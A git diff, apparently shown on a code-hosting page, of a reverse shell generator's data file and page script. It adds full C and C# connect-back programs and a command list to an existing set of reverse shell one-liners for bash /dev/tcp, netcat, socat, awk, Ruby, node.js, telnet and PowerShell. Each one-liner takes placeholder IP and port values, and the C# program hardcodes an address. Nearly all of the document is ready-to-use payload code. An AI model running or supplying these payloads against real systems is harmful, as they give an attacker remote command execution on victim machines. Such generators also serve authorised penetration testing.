|
||||
setLocalStorage(autoCopySwitch, "auto-copy", "checked");
|
||||
});
|
||||
|
||||
/*
|
||||
* Init
|
||||
*/
|
||||
$(document).ready(function () {
|
||||
rsg.init()
|
||||
rsg.update()
|
||||
})
|
||||
|
||||
|
||||
// Popper tooltips
|
||||
$(function () {
|
||||
$('[data-toggle="tooltip"]').tooltip()
|
||||
})
|
||||
});
|
||||
|
||||
|
||||
// TODO: add a random fifo for netcat mkfifo
|
||||
let randomId = Math.random().toString(36).substring(2,4);
|
||||
</script>
|
||||
|
||||
<script src="js/light-mode-switch.min.js"></script>
|
||||
|
||||
25
js/data.js
25
js/data.js
@ -11,12 +11,16 @@ const rsgData = {
|
||||
|
||||
shells: ['sh', '/bin/sh', 'bash', '/bin/bash', 'ash', 'bsh', 'csh', 'ksh', 'zsh', 'pdksh', 'tcsh'],
|
||||
|
||||
upgrade: ['python', ],
|
||||
//C shell needs fixed
|
||||
reverseShellsCommands: [
|
||||
['Bash -i', '{shell} -i >& /dev/tcp/{ip}/{port} 0>&1'],
|
||||
['Bash 196', '0<&196;exec 196<>/dev/tcp/{ip}/{port}; {shell} <&196 >&196 2>&196'],
|
||||
['Bash read line', 'exec 5<>/dev/tcp/{ip}/{port};cat <&5 | while read line; do $line 2>&5 >&5; done'],
|
||||
['Bash 5', '{shell} -i 5<> /dev/tcp/{ip}/{port} 0<&5 1>&5 2>&5'],
|
||||
['Bash udp', '{shell} -i >& /dev/udp/{ip}/{port} 0>&1'],
|
||||
['C', '#include <stdio.h\>\n#include <sys\/socket.h\>\n#include <sys\/types.h\>\n#include <stdlib.h\>\n#include <unistd.h>\n#include <netinet/in.h\>\n#include <arpa/inet.h\>\n\nint main(void){\n int port = {port};\n struct sockaddr_in revsockaddr;\n\n int sockt = socket(AF_INET, SOCK_STREAM, 0);\n revsockaddr.sin_family = AF_INET; \n revsockaddr.sin_port = htons(port);\n revsockaddr.sin_addr.s_addr = inet_addr("{ip}");\n\n connect(sockt, (struct sockaddr *) &revsockaddr, \n sizeof(revsockaddr));\n dup2(sockt, 0);\n dup2(sockt, 1);\n dup2(sockt, 2);\n\n char * const argv[] = {"{shell}", NULL};\n execve("{shell}", argv, NULL);\n\n return 0; \n}'],
|
||||
['C#', 'using System;\nusing System.Text;\nusing System.IO;\nusing System.Diagnostics;\nusing System.ComponentModel;\nusing System.Linq;\nusing System.Net;\nusing System.Net.Sockets;\n\n\nnamespace ConnectBack\n{\n public class Program\n {\n static StreamWriter streamWriter;\n\n public static void Main(string[] args)\n {\n using(TcpClient client = new TcpClient("10.0.2.15", 443))\n {\n using(Stream stream = client.GetStream())\n {\n using(StreamReader rdr = new StreamReader(stream))\n {\n streamWriter = new StreamWriter(stream);\n \n StringBuilder strInput = new StringBuilder();\n\n Process p = new Process();\n p.StartInfo.FileName = "cmd.exe";\n p.StartInfo.CreateNoWindow = true;\n p.StartInfo.UseShellExecute = false;\n p.StartInfo.RedirectStandardOutput = true;\n p.StartInfo.RedirectStandardInput = true;\n p.StartInfo.RedirectStandardError = true;\n p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);\n p.Start();\n p.BeginOutputReadLine();\n\n while(true)\n {\n strInput.Append(rdr.ReadLine());\n //strInput.Append("\\n");\n p.StandardInput.WriteLine(strInput);\n strInput.Remove(0, strInput.Length);\n }\n }\n }\n }\n }\n\n private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)\n {\n StringBuilder strOutput = new StringBuilder();\n\n if (!String.IsNullOrEmpty(outLine.Data))\n {\n try\n {\n strOutput.Append(outLine.Data);\n streamWriter.WriteLine(strOutput);\n streamWriter.Flush();\n }\n catch (Exception err) { }\n }\n }\n\n }\n}'],
|
||||
['nc mkfifo', 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell} -i 2>&1|nc {ip} {port} >/tmp/f'],
|
||||
['nc -e', 'nc -e {shell} {ip} {port}'],
|
||||
['nc -c', 'nc -c {shell} {ip} {port}'],
|
||||
@ -41,7 +45,7 @@ const rsgData = {
|
||||
['Ruby #1', 'ruby -rsocket -e\'f=TCPSocket.open("{ip}",{port}).to_i;exec sprintf("{shell} -i <&%d >&%d 2>&%d",f,f,f)\''],
|
||||
['Ruby no sh', 'ruby -rsocket -e \'exit if fork;c=TCPSocket.new("{ip}","{port}");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end\''],
|
||||
['socat #1', 'socat TCP:{ip}:{port} EXEC:{shell}'],
|
||||
['socat #2 (TTY)', 'socat TCP:{ip}:{port} EXEC:\'bash -li\',pty,stderr,setsid,sigint,sane'],
|
||||
['socat #2 (TTY)', 'socat TCP:{ip}:{port} EXEC:\'{shell}\',pty,stderr,setsid,sigint,sane'],
|
||||
['awk', 'awk \'BEGIN {s = "/inet/tcp/0/{ip}/{port}"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}\' /dev/null'],
|
||||
['node.js', 'require(\'child_process\').exec(\'nc -e {shell} {ip} {port}\')'],
|
||||
['telnet', 'TF=$(mktemp -u);mkfifo $TF && telnet {ip} {port} 0<$TF | {shell} 1>$TF'],
|
||||
@ -49,5 +53,22 @@ const rsgData = {
|
||||
|
||||
specialCommands: {
|
||||
'PowerShell payload': '$client = New-Object System.Net.Sockets.TCPClient("{ip}",{port});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
|
||||
}
|
||||
},
|
||||
commands: [
|
||||
{
|
||||
name: 'Bash -i',
|
||||
command: '{shell} -i >& /dev/tcp/{ip}/{port} 0>&1',
|
||||
meta: ['linux', 'windows', 'mac']
|
||||
},
|
||||
{
|
||||
name: 'Bash 196',
|
||||
command: '0<&196;exec 196<>/dev/tcp/{ip}/{port}; {shell} <&196 >&196 2>&196',
|
||||
meta: ['windows', 'mac']
|
||||
},
|
||||
{
|
||||
name: 'Bash read line',
|
||||
command: 'exec 5<>/dev/tcp/{ip}/{port};cat <&5 | while read line; do $line 2>&5 >&5; done',
|
||||
meta: ['linux', 'mac']
|
||||
},
|
||||
]
|
||||
}
|
||||
|
||||
Loading…
Reference in New Issue
Block a user